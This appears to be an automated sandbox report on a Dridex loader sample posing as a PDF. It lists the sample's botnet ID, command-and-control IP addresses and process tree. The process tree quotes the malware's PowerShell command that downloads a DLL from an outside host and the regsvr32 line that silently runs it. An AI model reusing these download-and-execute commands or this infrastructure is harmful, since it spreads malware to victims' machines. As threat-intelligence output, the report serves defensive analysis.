Analysis
- Max time kernel: 150s
- Max time network: 149s
- Platform: windows10_x64
- Resource: win10v20201028
- Submitted: 12-01-2021 15:10
Tasks
- Static task static1
- Behavioral task behavioral1: sample Documentation_N00467290036012021.pdf.exe, resource win7v20201028
- Behavioral task behavioral2: sample Documentation_N00467290036012021.pdf.exe, resource win10v20201028
General
- Target: Documentation_N00467290036012021.pdf.exe

Malware Config
- Extracted URL: http://pecas24.mypart.pt/l0sjk3o.dll
- Extracted family: dridex
  - Botnet: 10555
  - C2 addresses:
    - 77.220.64.37:443
    - 80.86.91.27:3308
    - 5.100.228.233:3389
    - 46.105.131.65:1512
Signatures
- YARA rule match: dridex_ldr
  - Resource: behavioral2/memory/412-21-0x0000000000400000-0x000000000043D000-memory.dmp
- Blocklisted process makes network request (1 IoC)
  - Process: powershell.exe (PID 2388), flow 12
- Loads dropped DLL (1 IoC)
  - Process: regsvr32.exe (PID 412)
- Enumerates physical storage devices (1 TTP)
  - Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
- Runs ping.exe (1 TTP, 1 IoC)
- Suspicious behavior: EnumeratesProcesses (3 IoCs)
  - Process: powershell.exe (PID 2388), 3 events
- Suspicious use of AdjustPrivilegeToken (1 IoC)
  - Process: powershell.exe (PID 2388), Token: SeDebugPrivilege
- Suspicious use of WriteProcessMemory (12 IoCs)
  - PID 500 Documentation_N00467290036012021.pdf.exe wrote to memory of PID 2444 cmd.exe (3 events)
  - PID 2444 cmd.exe wrote to memory of PID 2764 PING.EXE (3 events)
  - PID 2444 cmd.exe wrote to memory of PID 2388 powershell.exe (3 events)
  - PID 2444 cmd.exe wrote to memory of PID 412 regsvr32.exe (3 events)
Processes
- C:\Users\Admin\AppData\Local\Temp\Documentation_N00467290036012021.pdf.exe (PID 500, depth 1)
  Command line: "C:\Users\Admin\AppData\Local\Temp\Documentation_N00467290036012021.pdf.exe"
  Signatures: Suspicious use of WriteProcessMemory
  - C:\Windows\SysWOW64\cmd.exe (PID 2444, depth 2)
    Command line: C:\Windows\system32\cmd.exe /c ""C:\appdata\8tttqwre8ttde8gbhsad\DVP.bat" "
    Signatures: Suspicious use of WriteProcessMemory
    - C:\Windows\SysWOW64\PING.EXE (PID 2764, depth 3)
      Command line: ping certificaton.com (the remaining argument bytes are unreadable in the report)
      Signatures: Runs ping.exe
    - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 2388, depth 3)
      Command line: powershell (new-object System.Net.WebClient).DownloadFile('http://pecas24.mypart.pt/l0sjk3o.dll','C:\Users\Admin\AppData\Local\Temp\g7t5jgtz.dll');
      Signatures: Blocklisted process makes network request; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
    - C:\Windows\SysWOW64\regsvr32.exe (PID 412, depth 3)
      Command line: regsvr32 -s g7t5jgtz.dll
      Signatures: Loads dropped DLL
Downloads
Dropped files (MD5/SHA1/SHA256/SHA512 hashes are listed in the original report):
- C:\Users\Admin\AppData\Local\Temp\g7t5jgtz.dll
- C:\appdata\8tttqwre8ttde8gbhsad\DVP.bat
Memory dumps
- PID 412 (regsvr32.exe)
  - memory/412-18-0x0000000000000000-mapping.dmp
  - memory/412-21-0x0000000000400000-0x000000000043D000-memory.dmp (244KB; YARA match dridex_ldr)
- PID 2388 (powershell.exe)
  - memory/2388-5-0x0000000000000000-mapping.dmp
  - memory/2388-6-0x00000000727A0000-0x0000000072E8E000-memory.dmp (6.9MB)
  - memory/2388-7-0x0000000006F30000-0x0000000006F31000-memory.dmp (4KB)
  - memory/2388-8-0x0000000007760000-0x0000000007761000-memory.dmp (4KB)
  - memory/2388-9-0x0000000007610000-0x0000000007611000-memory.dmp (4KB)
  - memory/2388-10-0x0000000007F00000-0x0000000007F01000-memory.dmp (4KB)
  - memory/2388-11-0x00000000076E0000-0x00000000076E1000-memory.dmp (4KB)
  - memory/2388-12-0x0000000007F80000-0x0000000007F81000-memory.dmp (4KB)
  - memory/2388-13-0x0000000007ED0000-0x0000000007ED1000-memory.dmp (4KB)
  - memory/2388-14-0x0000000008880000-0x0000000008881000-memory.dmp (4KB)
  - memory/2388-15-0x00000000086A0000-0x00000000086A1000-memory.dmp (4KB)
  - memory/2388-16-0x0000000009E40000-0x0000000009E41000-memory.dmp (4KB)
  - memory/2388-17-0x00000000093C0000-0x00000000093C1000-memory.dmp (4KB)
- PID 2444 (cmd.exe)
  - memory/2444-2-0x0000000000000000-mapping.dmp
- PID 2764 (PING.EXE)
  - memory/2764-4-0x0000000000000000-mapping.dmp